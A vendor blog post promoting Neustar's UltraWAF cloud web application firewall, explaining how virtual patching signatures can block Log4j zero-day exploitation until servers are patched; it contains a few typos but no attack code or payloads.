Introducing UltraAPI: Bash bots and secure APIs.

When Facing a Zero-Day Threat, A Good WAF Can Be Your Best Friend

When Facing a Zero-Day Threat, A Good WAF Can Be Your Best Friend

Late last year, a new Zero-Day vulnerability was announced reporting a vulnerability in the Apache Log4j logging system that could allow arbitrary code execution on unpatched systems. The Apache Log4j is a popular logging utility so there is a large potential for vulnerable systems. The news of the Zero-Day threat sent many CISOs, security teams, and applications teams around the globe, into a frenzy of activity taking inventory of their internet facing systems, checking for Log4j, checking revision levels, and putting into effect emergency patching. Many organizations took the appropriate pro-active step of reaching out to business partners and vendors to assess the potential exposure there. The timing on the announcement of this threat came at a somewhat challenging time. Most organizations found out about the exposure on Friday, December 10th, a Friday during the Judeo-Christian holiday season when many people are taking personal time off, and networks and applications are entering change moratoriums. This makes the effort of remediation that much more of a challenge.

Fact_The good news is that for companies that have deployed Web Application Firewall (WAF) technology or contract WAF functions from their cloud security vendors, there is likely to be a quick and easy solution to the Zero-Day threat: virtual patching. Virtual patching is a function that exists on many WAF solutions that will trick any potential attackers into thinking that your applications are not vulnerable to this threat. WAF solutions are deployed in-line with web application traffic and act as reverse proxies between the clients of the application and the origin servers. The WAF terminates the connection with the client, ensures that the client is not performing any malicious actions, and then creates a separate connection to the server bridging data between the two. Since it is terminating the client traffic, the WAF can act on behalf of the origin server and cover up for any vulnerabilities that exist on the server. Virtual patching is one of the ways that this is done. When a new vulnerability CVE is published, a signature specific to that vulnerability is published to the WAF. Once enabled, the WAF will look for the specific traffic that would trigger the vulnerability and block that traffic. IT and security teams can easily turn on virtual patching for a specific vulnerability as soon as the signature is published, and this will protect all the servers behind the WAF until the team can patch them. This greatly reduces the urgency and operational impact of Zero-Day attacks. Many WAF vendors also receive prior notice of a pending vulnerability announcement, so they can craft a signature that is available as soon as or soon after the vulnerability is announced.

I’m pleased to report that Neustar Security Services’ (NSS) UltraWAF cloud based WAF solution had a signature available shortly after the vulnerability was announced. Custom/web-application-firewallers of UltraWAF can search for the signature by CVE and apply it with a BLOCK action ensuring all your potentially exposed servers are protected. The NSS UltraWAF solution is fully hosted in the cloud and can ubiquitously protect assets deployed on-premises, in the cloud, in multi-cloud, and in hybrid environments, making it an easy option to gain comprehensive protection. You can find more information about how UltraWAF can help protect your internet facing web applications here. To speak to a NSS UltraWAF Expert, please contact us.

CVE-2021044228 in the UltraWAF portal

Figure 1: CVE-2021044228 in the UltraWAF portal